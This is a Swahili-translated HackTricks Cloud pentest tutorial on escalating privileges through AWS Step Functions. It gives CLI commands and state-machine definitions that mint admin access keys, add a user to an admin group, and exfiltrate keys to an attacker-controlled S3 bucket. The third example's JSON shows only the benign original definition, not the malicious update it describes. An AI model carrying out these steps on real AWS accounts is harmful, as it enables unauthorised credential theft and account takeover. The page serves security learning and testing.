HackTricks CloudAWS - Step Functions Privesc
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Step Functions
Kwa taarifa zaidi kuhusu huduma hii ya AWS, angalia:
Rasilimali za Task
Teknolojia hizi za privilege escalation zitahitaji kutumia baadhi ya AWS Step Functions resources ili kutekeleza vitendo vinavyotakiwa vya privilege escalation.
Ili kuangalia vitendo vyote vinavyowezekana, unaweza kwenda kwenye akaunti yako ya AWS, uchague action ungependa kutumia na uone vigezo vinavyotumika, kama katika:
Au unaweza pia kwenda kwenye API documentation ya AWS na ukakagua kila action documentation:
states:TestState & iam:PassRole
Mwanaoruaji mwenye ruhusa za states:TestState & iam:PassRole anaweza kujaribu state yoyote na kupitisha IAM role yoyote kwa state bila kuunda au kusasisha state machine iliyopo, jambo ambalo linaweza kuwezesha upatikanaji usioidhinishwa kwa huduma nyingine za AWS kwa kutumia ruhusa za role hizo. Pamoja, ruhusa hizi zinaweza kusababisha vitendo vingi visivyoidhinishwa, kuanzia kuathiri workflows au kubadilisha data hadi uvunjifu wa data, kuathiri rasilimali, na privilege escalation.
aws stepfunctions test-state --definition <value> --role-arn <value> [--input <value>] [--inspection-level <value>] [--reveal-secrets | --no-reveal-secrets]
Mifano ifuatayo inaonyesha jinsi ya kujaribu state inayounda ufunguo wa upatikanaji kwa mtumiaji admin kwa kutumia ruhusa hizi na role yenye kibali pana katika mazingira ya AWS. Role hii yenye kibali inapaswa kuwa na sera yoyote yenye idhini ya juu inayohusishwa nayo (kwa mfano arn:aws:iam::aws:policy/AdministratorAccess) ambayo inaruhusu state kufanya kitendo cha iam:CreateAccessKey:
- stateDefinition.json:
{
"Type": "Task",
"Parameters": {
"UserName": "admin"
},
"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
"End": true
}
- Amri iliyotekelezwa kutekeleza privesc:
aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam::<account-id>:role/PermissiveRole
{
"output": "{
\"AccessKey\":{
\"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
\"CreateDate\":\"2024-07-09T16:59:11Z\",
\"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
\"Status\":\"Active\",
\"UserName\":\"admin\"
}
}",
"status": "SUCCEEDED"
}
Athari Inayoweza Kutokea: Utekelezaji usioidhinishwa na uendeshaji wa workflows na upatikanaji wa rasilimali nyeti, ambayo inaweza kusababisha uvunjaji mkubwa wa usalama.
states:CreateStateMachine & iam:PassRole & (states:StartExecution | states:StartSyncExecution)
Mshambulizi mwenye states:CreateStateMachine & iam:PassRole ataweza kuunda state machine na kuiweka role yoyote ya IAM, kuruhusu upatikanaji usioidhinishwa kwa huduma nyingine za AWS kwa kutumia ruhusa za role hizo. Tofauti na mbinu ya privesc iliyotangulia (states:TestState & iam:PassRole), hii haitekelezi yenyewe; utahitaji pia ruhusa za states:StartExecution au states:StartSyncExecution ili kuanza utekelezaji wa state machine. (states:StartSyncExecution haipatikani kwa standard workflows, ila kwa express state machines).
# Create a state machine
aws stepfunctions create-state-machine --name <value> --definition <value> --role-arn <value> [--type <STANDARD | EXPRESS>] [--logging-configuration <value>]\
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
# Start a state machine execution
aws stepfunctions start-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
# Start a Synchronous Express state machine execution
aws stepfunctions start-sync-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
Mifano ifuatayo inaonyesha jinsi ya kuunda state machine ambayo inaunda access key kwa mtumiaji admin na kusafirisha access key hiyo kwa S3 bucket inayodhibitiwa na mshambuliaji, ikitumia ruhusa hizi na role isiyozuia ya mazingira ya AWS. Role hii isiyozuia inapaswa kuwa na sera yoyote ya kiwango cha juu inayohusiana nayo (kwa mfano arn:aws:iam::aws:policy/AdministratorAccess) inayomruhusu state machine kufanya vitendo vya iam:CreateAccessKey na s3:putObject.
- stateMachineDefinition.json:
{
"Comment": "Malicious state machine to create IAM access key and upload to S3",
"StartAt": "CreateAccessKey",
"States": {
"CreateAccessKey": {
"Type": "Task",
"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
"Parameters": {
"UserName": "admin"
},
"ResultPath": "$.AccessKeyResult",
"Next": "PrepareS3PutObject"
},
"PrepareS3PutObject": {
"Type": "Pass",
"Parameters": {
"Body.$": "$.AccessKeyResult.AccessKey",
"Bucket": "attacker-controlled-S3-bucket",
"Key": "AccessKey.json"
},
"ResultPath": "$.S3PutObjectParams",
"Next": "PutObject"
},
"PutObject": {
"Type": "Task",
"Resource": "arn:aws:states:::aws-sdk:s3:putObject",
"Parameters": {
"Body.$": "$.S3PutObjectParams.Body",
"Bucket.$": "$.S3PutObjectParams.Bucket",
"Key.$": "$.S3PutObjectParams.Key"
},
"End": true
}
}
}
- Amri iliyotekelezwa ili kuunda state machine:
aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole
{
"stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
"creationDate": "2024-07-09T20:29:35.381000+02:00"
}
- Amri iliyotekelezwa ili kuanza utekelezaji wa state machine iliyotengenezwa hapo awali:
aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
{
"executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
"startDate": "2024-07-09T20:33:35.466000+02:00"
}
Warning
S3 bucket inayodhibitiwa na attacker inapaswa kuwa na ruhusa za kupokea s3:PutObject action kutoka kwa victim account.
Athari Inayowezekana: Utekelezaji na uhariri wa bila idhini wa workflows na upatikanaji wa rasilimali nyeti, ambao unaweza kusababisha uvunjaji mkubwa wa usalama.
states:UpdateStateMachine & (not always required) iam:PassRole
Attacker mwenye ruhusa states:UpdateStateMachine angeweza kubadilisha ufafanuzi wa state machine, akiongeza states za siri ambazo zinaweza kusababisha privilege escalation. Kwa njia hii, wakati mtumiaji halali anapoanzisha utekelezaji wa state machine, state mpya ya uharibifu itatekelezwa na privilege escalation itafanikiwa.
Kulingana na jinsi IAM Role inayohusishwa na state machine ilivyo na ruhusa, attacker atakumbana na hali 2:
- Permissive IAM Role: Ikiwa IAM Role inayohusishwa na state machine tayari ina ruhusa nyingi (kwa mfano ina polisi
arn:aws:iam::aws:policy/AdministratorAccessimeambatishwa), basi ruhusaiam:PassRolehaitahitajika kwa ajili ya privilege escalation kwa kuwa haitakuwa lazima kubadilisha IAM Role; ufafanuzi wa state machine utatosha. - Not permissive IAM Role: Tofauti na kesi ya awali, hapa attacker atahitaji pia ruhusa ya
iam:PassRolekwa sababu itakuwa muhimu kuhusisha IAM Role yenye ruhusa nyingi na state machine pamoja na kubadilisha ufafanuzi wa state machine.
aws stepfunctions update-state-machine --state-machine-arn <value> [--definition <value>] [--role-arn <value>] [--logging-configuration <value>] \
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
Mifano ifuatayo inaonyesha jinsi ya kusasisha state machine halali ambayo inaitisha tu HelloWorld Lambda function, ili kuongeza state ya ziada ambayo inaongeza mtumiaji unprivilegedUser kwenye administrator IAM Group. Kwa njia hii, wakati mtumiaji halali anapoanza utekelezaji wa state machine iliyosasishwa, state mpya ya uharibifu iliyofichika itatekelezwa na kuongezeka kwa ruhusa kutafanikiwa.
Warning
Iwapo state machine haina IAM Role yenye ruhusa pana iliyohusishwa, pia itahitajika ruhusa ya
iam:PassRoleili kusasisha IAM Role ili kuhusisha IAM Role yenye ruhusa pana (kwa mfano moja yenye seraarn:aws:iam::aws:policy/AdministratorAccessimeambatishwa).
{
"Comment": "Hello world from Lambda state machine",
"StartAt": "Start PassState",
"States": {
"Start PassState": {
"Type": "Pass",
"Next": "LambdaInvoke"
},
"LambdaInvoke": {
"Type": "Task",
"Resource": "arn:aws:states:::lambda:invoke",
"Parameters": {
"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
},
"Next": "End PassState"
},
"End PassState": {
"Type": "Pass",
"End": true
}
}
}
- Amri iliyotekelezwa ili kusasisha mashine ya hali halali:
aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json
{
"updateDate": "2024-07-10T20:07:10.294000+02:00",
"revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
}
Athari Inayowezekana: Utekelezaji usioidhinishwa na kuingilia au kuendesha workflows na upatikanaji wa rasilimali nyeti, linaloweza kusababisha uvunjaji mkubwa wa usalama.
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.